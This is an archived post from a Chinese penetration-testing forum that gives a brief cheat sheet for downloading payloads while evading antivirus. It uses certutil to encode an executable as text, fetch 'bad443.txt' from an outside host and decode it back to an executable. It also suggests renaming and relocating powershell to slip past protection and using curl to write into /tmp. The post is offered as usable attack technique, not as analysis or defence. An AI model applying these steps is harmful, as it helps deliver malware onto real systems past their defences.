中国网络渗透测试联盟's Archiver
论坛
›
网络渗透测试::『Network penetration testing』
› 渗透之绕过杀软下载
admin
发表于 2022-3-31 01:56:49
渗透之绕过杀软下载
certutil -encode 443.exe 443.txt
certutil.exe -urlcache -split -f "https://1.com/bad443.txt" 443.txt
certutil -decode 443.txt 443.exe
将powershell copy为别的名字到别的目录然后再执行即可绕过防护下载
curl url -o /tmp绕过杀软
页:
[1]
查看完整版本:
渗透之绕过杀软下载